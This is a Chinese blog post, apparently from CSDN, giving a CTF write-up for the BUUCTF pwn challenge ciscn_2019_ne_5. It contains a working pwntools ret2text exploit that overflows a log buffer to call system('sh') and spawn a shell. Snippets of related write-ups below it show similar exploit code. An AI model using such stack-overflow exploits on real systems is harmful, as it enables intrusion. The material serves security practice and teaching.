BUUCTF ciscn_2019_ne_5

最新推荐文章于 2024-08-25 21:38:13 发布
最新推荐文章于 2024-08-25 21:38:13 发布
阅读量818 收藏
点赞数
分类专栏: 题目 BUUCTF 文章标签: pwn2own 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/103855931
版权

这道题是一道典型的ROP一开始没找到参数~~
直接溢出emem
exp(其实我写的很麻烦了很简单的)

#!/usr/bin/python2
from pwn import *
local=1
if local==1:
	p=process('../binary/ciscn_2019_ne_5')
	elf=ELF('../binary/ciscn_2019_ne_5')
	libc=elf.libc
else:
	p=remote('node3.buuoj.cn',29140)
	elf=ELF('../binary/ciscn_2019_ne_5')

lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def add(log):
	p.sendlineafter(':','1')
	p.sendlineafter('log info:',log)

def show():
	p.sendlineafter(':','2')

def getflag():
	p.sendlineafter(':','4')

def print1():
	p.sendlineafter(':','3')

def exp():
	main=0x08048722
	pop_ebp=0x08048720
	p.recvuntil('password:')
	p.sendline('administrator')
	add('a'*0x4c+p32(elf.sym['system'])+p32(0xdeadbeef)+p32(0x80482ea))
	getflag()
	p.interactive()

if __name__=="__main__":
	exp()
doudoudedi
关注
专栏目录
ciscn_2019_ne_5
m0_52231248的博客
11-15 335
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
UEFITool_NE_A51_win32.zip
12-24
5. **引导加载器配置**:UEFITool可以用于配置和管理不同的引导加载器,比如GRUB2或Windows Boot Manager,确保系统能够正确启动。 6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全...
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1099
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
[BUUCTF] ciscn_2019_en_2
最新发布
a3314019530的博客
08-25 143
程序里面既没有现成的system也没有/bin/sh字符串。所以思路应该是通过put函数泄露libc地址,然后拿到system函数和/bin/sh字符串实现攻击。用ida查看一下,只有输入1进入encrypt()函数内,然后利用gets函数可以实现栈溢出攻击。64位程序,开了NX保护。先checksec一下。
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1667
buuctf ciscn_2019_ne_5题目分析
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2092
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 587
ciscn_2019_ne_5 BUUCTF
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
5. ne_110m_glaciated_areas.cpg:冰川覆盖区的数据,对于研究气候变化和冰川退缩情况至关重要。 6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地...
ciscn-2019-ne-3
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
NE_faceSR.rar_NE matlab_人脸库_人脸超分辨率_人脸重建_超分辨率
07-14
人脸超分辨率重建MATLAB源代码附有人脸库
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 229
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
BUUCTFciscn_2019_ne_5 Write Up
古月浪子的博客
08-06 860
题目是一道32位程序,依旧是rop 仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节 程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='i386' context.log_level='deb...
BUUCTF 刷题 ciscn_2019_ne_5
Helloity的博客
02-10 2322
先附上题目地址:BUUCTF在线评测 首当其冲checksec,开启了NX保护,32位程序。 Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 还是蛮有意思的一道题,我的IDA有些问题,无法f5主函数,那么就看汇编。我先运行了一下题目,发现要我们输入一个密码,但
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 810
[buuctf]ciscn_2019_n_5
BUU-ciscn_2019_ne_5
qq_45771413的博客
04-27 339
检查保护 IDA 逻辑不是很复杂, 第一次提示输入admin密码,密码要输入administrator才能下一步 接着是输入功能选项(0~3) 第一个输入,看起来没啥用,但是传入的是src字符串,返回的也是src 第二个输出,进去只有一个put,一无所有 第三个是打印,里面发现了system函数 第四个本应该是’0’选项,这里多了个’4’,函数名叫getflag,进去看是个输出flag的函数,初步预测跳转到这里就可以了。 第五个才是’0’的退出 int __cdecl main(int argc,
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1022
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
ciscn_2019_n_5
、moddemod
06-17 323
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
51单片机两种方式控制Nand_Flash读写详解
NandFlash的操作被分为三类:写命令、写地址和数据操作,其中AL和CL引脚在这些操作中表现出符合规范的电平变化,而nE引脚始终要求低电平,ALE信号则需要保持与NandFlash的片选信号nE一致,以便于数据传输。...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值